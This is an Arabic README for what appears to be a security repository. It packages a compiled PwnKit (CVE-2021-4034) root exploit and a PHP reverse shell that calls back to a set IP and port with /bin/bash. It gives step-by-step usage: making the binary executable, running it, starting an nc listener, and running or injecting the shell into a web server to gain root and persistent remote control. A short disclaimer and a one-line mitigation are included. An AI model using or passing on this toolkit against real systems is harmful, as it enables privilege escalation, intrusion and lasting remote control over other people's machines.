
مستودع بحث أمني يحتوي على برهان مفهوم (PoC) للثغرة الأمنية CVE-2021-4034 (PwnKit) وأدوات برمجة نصية لعرض تصعيد الامتيازات والتنفيذ عن بُعد في بيئات Linux.
⚠️ إخلاء مسؤولية: تم إنشاء هذا المستودع لأغراض تعليمية وبحثية في مجال الأمن فقط. المؤلف غير مسؤول عن سوء استخدام هذه الأدوات. استخدمه فقط في بيئات خاضعة للرقابة أو حيث لديك إذن صريح.
يحتوي هذا المستودع على دليل إثبات (PoC) مُجمّع للثغرة PwnKit (CVE-2021-4034)، وهي ثغرة حرجة لتصعيد الصلاحيات محليًا في مكون pkexec من Polkit.
بالإضافة إلى ذلك، تم تضمين سكريبت شل عكسية بلغة PHP جاهز للنشر بعد الاستغلال أو كمتجه وصول أولي.
الحصول على صلاحيات root في أنظمة لينكس الضعيفة وإنشاء استمرارية أو تحكم عن بُعد عبر شل عكسية.
PwnKit (ملف ELF Binary)الاستغلال المُجمّع لـ CVE-2021-4034.
pkexec لتحميل مكتبة مشتركة ضارة وتنفيذ كود كـ root.pkexec على الهدف.reverseShell.phpحمولة خفيفة لإنشاء اتصال عكسي.
192.168.1.84444/bin/bashphp reverseShell.php) أو حقنه في خادم ويب ضعيف.PwnKit إلى النظام المستهدف.chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php إذا كان عنوان IP الخاص بك مختلفًا عن الإعداد الافتراضي.php reverseShell.php
تقع هذه الثغرة في كيفية تعامل pkexec مع وسائط سطر الأوامر. عند تمرير قائمة وسائط فارغة، يحاول pkexec الوصول إلى argv[1] خارج الحدود، مما يسمح للمهاجم بالكتابة فوق متغيرات البيئة في الذاكرة، وتحديدًا حقن متغير ضار GCONV_PATH لاختطاف تدفق التنفيذ.
للحماية من هذا الاستغلال:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️